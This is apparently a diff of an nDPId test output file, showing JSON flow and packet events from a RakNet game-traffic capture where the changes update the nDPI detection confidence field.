00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"raknet.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946713048389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":946713048389,"pkt":"eJS0JASgYDjgxTWgCABFAAA+UW1AAD8Rbs\/AqAJklJkjzYC46nUAKuu4BwD\/\/wD+\/v7+\/f39\/RI0VngEa2bcMup1AkAAAAAASQ8CfA=="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"raknet.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":946713048391,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":946713048391,"pkt":"eJS0JASgYDjgxTWgCABFAAA+UW1AAD8Rbs\/AqAJklJkjzYC46nUAKuu4BwD\/\/wD+\/v7+\/f39\/RI0VngEa2bcMup1AkAAAAAASQ8CfA=="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"raknet.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":946713048392,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":946713048392,"pkt":"eJS0JASgYDjgxTWgCABFAAA+UW1AAD8Rbs\/AqAJklJkjzYC46nUAKuu4BwD\/\/wD+\/v7+\/f39\/RI0VngEa2bcMup1AkAAAAAASQ8CfA=="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"raknet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946713048389,"flow_last_seen":946713048392,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":946713048392,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32952,"dst_port":60021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"raknet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946713048389,"flow_last_seen":946713048392,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":946713048392,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32952,"dst_port":60021,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"raknet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048402,"flow_last_seen":946713048402,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":946713048402,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60025,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"raknet.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946713048402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":946713048402,"pkt":"YDjgxTWgeJS0JASgCABFAAA\/5elAADgR4VGUmSPNwKgCZOp5gLcAK28ACAD\/\/wD+\/v7+\/f39\/RI0VngABZGlNgURqASlRXt6gLcCQAA="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"raknet.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946713048410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":946713048410,"pkt":"YDjgxTWgeJS0JASgCABFAAA\/5elAADgR4VGUmSPNwKgCZOp5gLcAK28ACAD\/\/wD+\/v7+\/f39\/RI0VngABZGlNgURqASlRXt6gLcCQAA="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"raknet.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":946713048422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":946713048422,"pkt":"YDjgxTWgeJS0JASgCABFAAA\/5elAADgR4VGUmSPNwKgCZOp5gLcAK28ACAD\/\/wD+\/v7+\/f39\/RI0VngABZGlNgURqASlRXt6gLcCQAA="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"raknet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946713048402,"flow_last_seen":946713048422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":946713048422,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60025,"dst_port":32951,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"raknet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946713048402,"flow_last_seen":946713048422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":946713048422,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60025,"dst_port":32951,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"raknet.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048554,"flow_last_seen":946713048554,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":946713048554,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32953,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"raknet.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946713048554,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":946713048554,"pkt":"eJS0JASgYDjgxTWgCABFAAA4UXJAAD8RbtDAqAJklJkjzYC56nUAJN\/PhAAAAEAAkAAAAAkAAAAASQ8CfAAAAAAAFek7AA=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"raknet.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048554,"flow_last_seen":946713048554,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":946713048554,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32953,"dst_port":60021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"raknet.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048554,"flow_last_seen":946713048554,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":946713048554,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32953,"dst_port":60021,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"raknet.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946713048585,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":946713048585,"pkt":"eJS0JASgYDjgxTWgCABFAAA4UXJAAD8RbtDAqAJklJkjzYC56nUAJN\/PhAAAAEAAkAAAAAkAAAAASQ8CfAAAAAAAFek7AA=="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"raknet.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":946713048601,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":946713048601,"pkt":"eJS0JASgYDjgxTWgCABFAAA4UXJAAD8RbtDAqAJklJkjzYC56nUAJN\/PhAAAAEAAkAAAAAkAAAAASQ8CfAAAAAAAFek7AA=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"raknet.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048606,"flow_last_seen":946713048606,"flow_idle_time":200000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":946713048606,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60690,"dst_port":60028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"raknet.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946713048606,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":162,"pkt_l4_len":128,"thread_ts_msec":946713048606,"pkt":"eJS0JASgYDjgxTWgCABFAACUsVZAAD8RDpDAqAJklJkjze0S6nwAgCFnhAEAAGAC8AEAAAAAAAATBGtm3DLqfASA\/\/\/+7REE\/\/\/\/\/wAABP\/\/\/\/8AAAT\/\/\/\/\/AAAE\/\/\/\/\/wAABP\/\/\/\/8AAAT\/\/\/\/\/AAAE\/\/\/\/\/wAABP\/\/\/\/8AAAT\/\/\/\/\/AAAAAAATDAsawQAAAAAAAO8BAABIAAAAAAAAAO8B"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"raknet.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048606,"flow_last_seen":946713048606,"flow_idle_time":200000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":946713048606,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60690,"dst_port":60028,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"raknet.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048606,"flow_last_seen":946713048606,"flow_idle_time":200000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":946713048606,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60690,"dst_port":60028,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"raknet.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048610,"flow_last_seen":946713048610,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":946713048610,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60005,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"raknet.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946713048610,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":18,"thread_ts_msec":946713048610,"pkt":"YDjgxTWgeJS0JASgCABFAAAm5hVAADgR4T6UmSPNwKgCZOplgLcAElcnwAABAAEAAAIAAAAAAAAAAAAA"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"raknet.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048610,"flow_last_seen":946713048610,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":946713048610,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60005,"dst_port":32951,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"raknet.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048610,"flow_last_seen":946713048610,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":946713048610,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60005,"dst_port":32951,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"raknet.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":946713048622,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":18,"thread_ts_msec":946713048622,"pkt":"YDjgxTWgeJS0JASgCABFAAAm5hVAADgR4T6UmSPNwKgCZOplgLcAElcnwAABAAEAAAIAAAAAAAAAAAAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"raknet.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":946713048623,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":18,"thread_ts_msec":946713048623,"pkt":"YDjgxTWgeJS0JASgCABFAAAm5hVAADgR4T6UmSPNwKgCZOplgLcAElcnwAABAAEAAAIAAAAAAAAAAAAA"} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":62,"source":"raknet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946711673443,"flow_last_seen":946711673573,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1953,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":946713048623,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60689,"dst_port":60028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":62,"source":"raknet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946711624286,"flow_last_seen":946711624425,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1953,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":946713048623,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":62,"source":"raknet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946711673443,"flow_last_seen":946711673573,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1953,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":946713048623,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60689,"dst_port":60028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":62,"source":"raknet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946711624286,"flow_last_seen":946711624425,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1953,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":946713048623,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"raknet.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713064624,"flow_last_seen":946713064624,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":946713064624,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"raknet.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946713064624,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":946713064624,"pkt":"eJS0JASgYDjgxTWgCABFAAAzl7tAAD8RKJzAqAJklJkjza3V6n8AHysXwAAFAQAAAAEAAAABAAAAAQAAAAEAAAA="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"raknet.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713064624,"flow_last_seen":946713064624,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":946713064624,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"raknet.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713064624,"flow_last_seen":946713064624,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":946713064624,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"raknet.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713124625,"flow_last_seen":946713124625,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":946713124625,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":59935,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"raknet.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946713124625,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":946713124625,"pkt":"eJS0JASgYDjgxTWgCABFAABBl7tAAD8RKJzAqAJklJkjza3V6h8ALSsXHBERERERERERIiIiIiIiIiIzMzMzMzMzMzMzMzMzMzMzAAJBQQ=="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"raknet.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":946713184626,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":946713184626,"pkt":"eJS0JASgYDjgxTWgCABFAABBl7tAAD8RKJzAqAJklJkjza3V6h8ALSsXHBERERERERERIiIiIiIiIiIzMzMzMzMzMzMzMzMzMzMzAAJBQQ=="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"raknet.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":946713244627,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":946713244627,"pkt":"eJS0JASgYDjgxTWgCABFAABBl7tAAD8RKJzAqAJklJkjza3V6h8ALSsXHBERERERERERIiIiIiIiIiIzMzMzMzMzMzMzMzMzMzMzAAJBQQ=="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"raknet.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946713124625,"flow_last_seen":946713244627,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":59935,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946713048606,"flow_last_seen":946713048606,"flow_idle_time":200000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60690,"dst_port":60028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946713064624,"flow_last_seen":946713064624,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048610,"flow_last_seen":946713048623,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60005,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946713048252,"flow_last_seen":946713048361,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1953,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32951,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"raknet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":946713048389,"flow_last_seen":946713048392,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":946713244627,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32952,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 